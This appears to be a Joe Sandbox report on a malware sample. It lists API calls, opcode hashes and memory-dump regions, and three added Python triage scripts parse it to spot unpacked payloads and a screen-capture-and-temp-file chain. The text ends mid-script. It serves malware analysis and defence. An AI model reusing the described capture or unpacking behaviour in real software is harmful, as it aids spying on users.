                                                                                                                                                                                                                                                                    • Instruction ID: 68d32d313e7cd56293a75c5be2e7a9e757f88f82f08f61895820b11ee7e3ce6f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42F0553A30020857CB089F36DC0476BBF90EFC2754B0A005EEF098B290C3759842C790
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                    • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                    • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00410672,024CFE60), ref: 024D08D2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                    • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                    • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
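The two SetUnhandledExceptionFilter records above carry the same Opcode ID (b15aee97...) but come from different memory dumps: the PE image at 00400000 (based on PE: true) and the region at 024C0000 (based on PE: false). That is the pattern to look for when a sample is flagged for unpacking: code from the image shows up again in a second, non-PE region. The Python below is an added example, not part of the Joe Sandbox report or its tooling. It parses records in this plain-text layout, lists Opcode IDs recovered from more than one dump, and indexes which dumps call each imported API. SAMPLE is a constructed, abridged copy of four records from this listing; the meaning of the .sdmp name fields beyond the base address is an assumption, not something the page documents.

```python
"""Added example (not part of the Joe Sandbox report): cross-reference the
plain-text function records above by Opcode ID and by imported API, to see
which functions were recovered from more than one memory dump."""
import re
from collections import defaultdict

# Constructed, abridged copy of four records from this listing.
SAMPLE = """\
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ExceptionFilterUnhandled
• API String ID: 3192549508-0
• Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
APIs
• SetUnhandledExceptionFilter.KERNEL32(00410672,024CFE60), ref: 024D08D2
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• API String ID: 3192549508-0
• Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
APIs
  • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
• EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024FBCAB,024F0A1C,?,?,?,?,?,024F0A1C,?,?,?), ref: 024FB520
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Similarity
• API ID: ErrorLast$EnumLocalesSystem_free
• API String ID: 2016158738-0
• Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• API String ID:
• Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
• Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
"""

# Call lines read "Name.MODULE(args), ref: addr", optionally prefixed with
# "Part of subcall function XXXX: "; only the Name.MODULE pair is kept.
API_RE = re.compile(r"^\s*•\s+(?:Part of subcall function [0-9A-Fa-f]+: )?(\w+\.\w+)")
SRC_RE = re.compile(r"Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
FIELD_RE = re.compile(r"^\s*•\s+(API ID|API String ID|Opcode ID|Instruction ID): ?(.*)$")

def new_record():
    return {"apis": [], "source": None, "offset": None, "based_on_pe": None,
            "API ID": "", "API String ID": "", "Opcode ID": "", "Instruction ID": ""}

def parse_records(text):
    """'APIs' always opens a record; a bare 'Memory Dump Source' opens one only
    when the current record already has a dump (records with no calls have no 'APIs')."""
    records, cur, section = [], None, None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs" or (s == "Memory Dump Source" and cur and cur["source"]):
            records.append(cur := new_record())
        if s in ("APIs", "Memory Dump Source", "Similarity"):
            section = s
            continue
        if cur is None:
            records.append(cur := new_record())
        if section == "APIs":
            if m := API_RE.match(line):
                cur["apis"].append(m.group(1))
        elif m := SRC_RE.search(line):
            cur["source"], cur["offset"] = m.group(1), int(m.group(2), 16)
            cur["based_on_pe"] = m.group(3) == "true"
        elif m := FIELD_RE.match(line):
            cur[m.group(1)] = m.group(2).strip()
    return records

def dump_fields(source):
    """Dot-separated hex fields of a .sdmp name as ints. Field 3 is the region
    base (it equals Offset); the rest is not documented on this page, so any
    reading of it (field 4 == 0x40 == PAGE_EXECUTE_READWRITE) is an assumption."""
    return [int(p, 16) for p in source.rsplit(".", 1)[0].split(".")]

def shared_functions(records):
    """Opcode ID -> sorted (offset, based_on_pe) pairs for IDs seen in more than
    one dump, i.e. the same code in the PE image and in a non-PE region."""
    by_id = defaultdict(set)
    for r in records:
        if r["Opcode ID"]:
            by_id[r["Opcode ID"]].add((r["offset"], r["based_on_pe"]))
    return {k: sorted(v) for k, v in by_id.items() if len(v) > 1}

def api_index(records):
    """Imported API (Name.MODULE) -> sorted dump offsets whose functions call it."""
    idx = defaultdict(set)
    for r in records:
        for api in r["apis"]:
            idx[api].add(r["offset"])
    return {k: sorted(v) for k, v in idx.items()}

if __name__ == "__main__":
    for oid, where in shared_functions(parse_records(SAMPLE)).items():
        print(oid[:16], [("%08X" % o) + ("" if pe else " non-PE") for o, pe in where])
```

Run against the full listing, shared_functions() gives the set of functions that exist in both the mapped image and the private region, which is a quick way to confirm that the 024C0000 region is a relocated copy of (part of) the image rather than unrelated code; api_index() shows which dumps reach the imports of interest, such as EnumSystemLocalesW or SetUnhandledExceptionFilter, without reading every record by hand.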
APIs
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
• Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
• Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
• Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
• Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
• Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
• Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
• Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                                                    • Instruction ID: f3b5f5190805b4698d63a461b06847c9acc7f3e95b14f595c6eda227b594814b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17D1B3721085A20AEF2D4A39847003BFFE26A521B730D479FD8F7CA6D2EF24D595D660
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                                                    • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                                                    • Instruction ID: 6fd82bfd921a4e0dfad55dc1dac07c35dcfbd6e2df2d00757058fac3d07aa892
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED613831E00B04DAFE386A2888517BF639EBF55A4BF04051BE8A3DB3C4D7159986C755
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                    • Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                    • Instruction ID: 44d39b294b373855e9238f4a0498103ab3e5305471e12ef49ac131f11b0c1c86
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D11087720004247FE19862ED9B42BBE385FAC522AB2C577BD8634B778D322D145D600
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623077365.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009F9000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_9f9000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                    • Instruction ID: 9cc36ecf668e2899a19adf54be0094a069d7649bab8b886230db3a790aa09711
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E118272340104AFDB54DF55DC81FA673EAEB89370B298065EE04CB316D676EC41C760
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                    • Instruction ID: 282f36453e78a46ab25232ea44878a20f757f6c52a57e84fc00a9fc6754f5c84
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F01F77A610600CFDF61CF28C904BAB33E9EB85205F1550AAD50697341E370A8418B90
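The entries above alternate between the mapped image at 0x400000 ("based on PE: true") and two non-image regions at 0x24C0000 and 0x9F9000 that carry Yara matches; the latter are the dumps an analyst pulls for config extraction. As an added example (not part of the Joe Sandbox report, not Joe Sandbox's own tooling), the Python below parses the Memory Dump Source blocks as they appear on this page and selects regions that are executable, privately allocated, not PE-backed and Yara-matched. The dotted field layout of the .sdmp name (pid.dump_idx.seq.base.protect.?.type.?) is my reading of the names on this page, not documented semantics; the winnt.h constants are real.

```python
import re
from dataclasses import dataclass

# Constructed input: the distinct Memory Dump Source entries from this report
# section, with the 0x400000 entry repeated to exercise deduplication.
REPORT_LINES = """\
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
Similarity
Memory Dump Source
• Source File: 00000000.00000002.4623077365.00000000009F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009F9000, based on PE: false
Joe Sandbox IDA Plugin
Yara matches
Similarity
"""

# Memory constants from winnt.h.
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

SOURCE_RE = re.compile(
    r"Source File:\s*(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)


@dataclass
class Region:
    name: str
    base: int
    protect: int
    mem_type: int
    pe_backed: bool
    yara: bool = False

    def is_unpacked_candidate(self) -> bool:
        """RWX, privately allocated, not a mapped PE image, Yara hit: the
        profile of a payload a packer stub decrypted into memory."""
        return (self.protect == PAGE_EXECUTE_READWRITE
                and self.mem_type == MEM_PRIVATE
                and not self.pe_backed
                and self.yara)


def parse_regions(text: str) -> list:
    """Parse Memory Dump Source entries, deduplicated by dump file name."""
    regions = {}
    current = None
    for line in text.splitlines():
        m = SOURCE_RE.search(line)
        if m:
            # ASSUMPTION: dotted fields are pid.dump_idx.seq.base.protect.?.type.?
            # (my reading of this page's names, not documented semantics).
            name = m.group("name")
            f = name[:-len(".sdmp")].split(".")
            base = int(f[3], 16)
            if base != int(m.group("offset"), 16):
                raise ValueError(f"offset/base mismatch in {name}")
            current = regions.setdefault(
                name,
                Region(name=name, base=base, protect=int(f[4], 16),
                       mem_type=int(f[6], 16), pe_backed=m.group("pe") == "true"),
            )
        elif line.strip() == "Yara matches" and current is not None:
            current.yara = True  # block follows Source File within the same entry
        elif line.strip() == "Memory Dump Source":
            current = None
    return sorted(regions.values(), key=lambda r: r.base)


def candidate_payloads(regions) -> list:
    """Regions worth pulling for config extraction, lowest base first."""
    return [r for r in regions if r.is_unpacked_candidate()]


if __name__ == "__main__":
    for r in candidate_payloads(parse_regions(REPORT_LINES)):
        print(f"pull {r.name}: base={r.base:#x} protect={r.protect:#x} type={r.mem_type:#x}")
```

The offset/base cross-check guards against a mis-read field layout: if the assumed position of the base address ever disagrees with the report's own Offset value, the parser fails loudly instead of silently mislabelling regions.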

APIs
• DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
• GetClientRect.USER32(?,?), ref: 0040214A
• GetDC.USER32(?), ref: 00402151
• CreateSolidBrush.GDI32(00646464), ref: 00402164
• SelectObject.GDI32(00000000,00000000), ref: 00402178
• CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
• SelectObject.GDI32(00000000,00000000), ref: 00402191
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
• MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004021EA
                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00402267
                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00402276
                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 0040227F
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                                                                                                                                                                                                                                    • String ID: Tahoma
                                                                                                                                                                                                                                                                    • API String ID: 3832963559-3580928618
                                                                                                                                                                                                                                                                    • Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                                                    • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 004025CD
                                                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                                                                                                                                                                                                                                    • ReleaseCapture.USER32 ref: 004025F2
                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00402619
                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                                                                                                                                                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                                                                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                                                                                                                                                                                                                                    • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402731
                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00402738
                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040273F
                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00402754
                                                                                                                                                                                                                                                                    • SetCapture.USER32(?), ref: 004027A1
                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004027D5
                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                                                                                                                                                                                                                                    • GetKeyState.USER32(0000001B), ref: 004027F8
                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 0040280D
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                                                                                                                                                                                                                                    • String ID: gya
                                                                                                                                                                                                                                                                    • API String ID: 2545303185-1989253062
                                                                                                                                                                                                                                                                    • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                                                    • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
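The API sequence listed for the function above, in address order, is the standard GDI screen-capture idiom: GetDC(00000000) takes the desktop DC, CreateCompatibleBitmap/CreateCompatibleDC/SelectObject set up an off-screen bitmap, and BitBlt copies into it with raster op 00CC0020 (SRCCOPY); GetTempPathW followed by GetTempFileNameW with the prefix "gya" then names a temporary file, which DeleteFileW removes later in the same function. The same function handles message 00000204 (WM_RBUTTONDOWN) in DefWindowProcW, calls SetCapture/ReleaseCapture, and checks GetKeyState(0000001B) (VK_ESCAPE). The script below is an added example written for this page, not part of the Joe Sandbox report or its IDA plugin: it parses "APIs" listings in exactly the form shown here (the sample text is copied from the listing above) and flags the capture chain and the temp-file drop, so the same check can be run across the other function entries of a report. Two caveats: the refs are static call sites found in the memory dump, not observed runtime calls, and the chain itself is also used by legitimate screenshot tools, so treat a hit as a lead for triage rather than a verdict.

```python
"""Scan Joe Sandbox per-function 'APIs' listings for the GDI screen-capture idiom."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample: the "APIs" listing of the function above, copied from the report.
SAMPLE_LISTING = """
• DestroyWindow.USER32(?), ref: 004025CD
• DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
• ReleaseCapture.USER32 ref: 004025F2
• GetDC.USER32(00000000), ref: 00402619
• CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
• CreateCompatibleDC.GDI32(?), ref: 004026A9
• SelectObject.GDI32(00000000,00000000), ref: 004026B3
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
• ShowWindow.USER32(?,00000000), ref: 004026EA
• GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
• GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
• DeleteFileW.KERNEL32(?), ref: 00402731
• DeleteDC.GDI32(00000000), ref: 00402738
• DeleteObject.GDI32(00000000), ref: 0040273F
• ReleaseDC.USER32(00000000,?), ref: 0040274D
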